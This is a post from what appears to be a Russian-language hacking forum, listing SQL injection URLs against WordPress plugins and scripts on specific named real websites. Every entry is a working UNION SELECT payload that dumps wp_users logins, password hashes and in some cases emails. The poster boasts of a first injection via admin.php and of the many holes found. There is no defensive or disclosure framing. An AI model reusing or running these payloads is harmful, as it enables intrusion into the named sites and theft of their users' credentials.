|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами:
8467184
Репутация:
1
|
|
Бажный водпресс:
---------------------------------------------------------------------------
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,use r_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(user_login,0x3a,u ser_p ass),4+from+wp_users--
(Уникальная вещь для меня, первый раз получилось через админ.пхп скулю провести)
P.S. Сервак виндовый
---------------------------------------------------------------------------
http://www.kfir.co.il/news.php?id=23+and+1=0+union+select+1,group_concat (u ser_login,0x3a,user_p ass),3,4,5,6,7,8,9+from+wp_users--
---------------------------------------------------------------------------
http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,u ser_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.bulldogdesigninc.com/News.php?id=12+AND+1=2+UNION+SELECT+0,1,2,3,group_ concat(user_login,0x3a,user_pass),5%20from%20wp_us ers--
---------------------------------------------------------------------------
http://www.jeremybouma.net/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://staroftheseakeywest.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://cycling4fun.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://www.giveawayriches.com/jvblog/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,n ull,concat(0x7c,user_login,0x7c,u ser_p ass,0x7c),null,null,null,null,null,null,null,null% 20%20from%20wp_users
---------------------------------------------------------------------------
З.Ы. Блин, да сколько же дырок-то....
|